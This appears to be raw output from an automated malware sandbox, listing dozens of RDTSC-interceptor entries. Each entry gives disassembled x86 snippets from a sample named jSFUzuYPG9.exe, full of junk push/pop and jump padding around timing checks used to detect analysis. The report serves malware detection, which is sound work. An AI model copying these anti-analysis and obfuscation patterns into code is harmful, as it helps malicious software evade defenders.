Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56790 second address: E56795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56795 second address: E567B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E567B3 second address: E567D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F4BA0D39713h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E567D8 second address: E567DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E567DC second address: E56867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007F4BA0D39718h 0x00000011 jbe 00007F4BA0D39712h 0x00000017 jmp 00007F4BA0D3970Ch 0x0000001c pop eax 0x0000001d or dword ptr [ebp+124553B2h], ebx 0x00000023 mov ecx, 3D0C8D29h 0x00000028 call 00007F4BA0D39709h 0x0000002d push eax 0x0000002e jnl 00007F4BA0D3970Ch 0x00000034 pop eax 0x00000035 push eax 0x00000036 jmp 00007F4BA0D39712h 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f push ebx 0x00000040 jmp 00007F4BA0D39713h 0x00000045 pop ebx 0x00000046 mov eax, dword ptr [eax] 0x00000048 push eax 0x00000049 push edx 0x0000004a jnp 00007F4BA0D39715h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56867 second address: E5686D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56B5D second address: E56B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56B63 second address: E56B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E570CF second address: E570D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5746B second address: E57480 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F4BA0D3F156h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E57480 second address: E574E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F4BA0D39708h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 pushad 0x00000023 mov bh, ch 0x00000025 mov ah, ECh 0x00000027 popad 0x00000028 lea eax, dword ptr [ebp+12481EFDh] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F4BA0D39708h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E574E6 second address: E574EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E574EB second address: E57587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4BA0D39715h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4BA0D39708h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+12481EB9h] 0x00000030 jmp 00007F4BA0D3970Ah 0x00000035 nop 0x00000036 pushad 0x00000037 jmp 00007F4BA0D39712h 0x0000003c pushad 0x0000003d jmp 00007F4BA0D39716h 0x00000042 jmp 00007F4BA0D39711h 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jo 00007F4BA0D39708h 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E57587 second address: E362E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007F4BA0D3F15Bh 0x00000028 call dword ptr [ebp+122D2947h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 jmp 00007F4BA0D3F15Ah 0x00000036 pop edi 0x00000037 jmp 00007F4BA0D3F169h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8DAF0 second address: E8DAFF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D39708h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8DC62 second address: E8DC6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jno 00007F4BA0D3F156h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8DDF4 second address: E8DDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8DDF8 second address: E8DDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8E0C0 second address: E8E0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39717h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8E0DD second address: E8E0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007F4BA0D3F156h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F4BA0D3F15Bh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8E390 second address: E8E3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Fh 0x00000009 jmp 00007F4BA0D39717h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4BA0D39710h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8E3CF second address: E8E3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E936D1 second address: E936E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F4BA0D39706h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E0DEC8 second address: E0DEF9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 js 00007F4BA0D3F156h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E0DEF9 second address: E0DEFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E93271 second address: E9329C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F4BA0D3F164h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E96057 second address: E9605B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9605B second address: E9605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9B21A second address: E9B21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9B21F second address: E9B227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9B227 second address: E9B255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39713h 0x0000000d jmp 00007F4BA0D39713h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9B406 second address: E9B40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9B40C second address: E9B410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA14CB second address: EA14D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA14D7 second address: EA14DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA14DB second address: EA14F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F4BA0D3F156h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jno 00007F4BA0D3F156h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA14F7 second address: EA152C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39718h 0x00000008 jmp 00007F4BA0D39718h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA152C second address: EA1532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9FE34 second address: E9FE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9FE38 second address: E9FE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F4BA0D3F167h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9FFAF second address: E9FFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9FFB4 second address: E9FFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9FFBC second address: E9FFC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9FFC6 second address: E9FFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E9FFCA second address: E9FFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56E49 second address: E56E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56E5B second address: E56EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 jmp 00007F4BA0D39711h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F4BA0D39708h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jo 00007F4BA0D3970Ch 0x00000033 xor edi, 46E59F1Ah 0x00000039 mov dh, ch 0x0000003b mov ebx, dword ptr [ebp+12481EF8h] 0x00000041 add eax, ebx 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F4BA0D39708h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000018h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d mov dword ptr [ebp+12467AE4h], edi 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F4BA0D3970Dh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56EF6 second address: E56EFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56EFB second address: E56F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 js 00007F4BA0D39706h 0x00000016 popad 0x00000017 jnl 00007F4BA0D39708h 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F4BA0D39708h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 push ebx 0x0000003a mov di, 3D32h 0x0000003e pop edx 0x0000003f sub edx, dword ptr [ebp+122D1E13h] 0x00000045 push 00000004h 0x00000047 mov edi, dword ptr [ebp+122D1F13h] 0x0000004d xor edx, 5DD72AF1h 0x00000053 nop 0x00000054 jmp 00007F4BA0D39713h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F4BA0D39713h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA06A2 second address: EA06A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA06A6 second address: EA06AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA06AC second address: EA06E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F160h 0x00000007 jnc 00007F4BA0D3F163h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4BA0D3F162h 0x00000017 jnc 00007F4BA0D3F156h 0x0000001d jl 00007F4BA0D3F156h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA4392 second address: EA43CB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4BA0D3970Bh 0x0000000f jp 00007F4BA0D3971Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EA40CC second address: EA40D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAA22A second address: EAA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAA22F second address: EAA253 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAA253 second address: EAA25D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAAB69 second address: EAAB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAAB6D second address: EAAB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39711h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAAB86 second address: EAAB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAAB8A second address: EAAB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAB16C second address: EAB198 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3F160h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EAB198 second address: EAB19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EABD28 second address: EABD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EABD2E second address: EABD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EABD32 second address: EABD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EABD36 second address: EABD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EABD3F second address: EABD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ah 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F4BA0D3F156h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EB4EC7 second address: EB4EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39718h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EB4EE3 second address: EB4EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EB4EE9 second address: EB4F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4BA0D3970Eh 0x0000000c jno 00007F4BA0D39706h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jg 00007F4BA0D39706h 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EB4F0A second address: EB4F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EB4F16 second address: EB4F2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EB50AF second address: EB50BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EB50BE second address: EB50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 ja 00007F4BA0D39708h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EBFB6F second address: EBFB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F4BA0D3F156h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EBFB7E second address: EBFB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EBFE17 second address: EBFE25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EC04ED second address: EC04F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
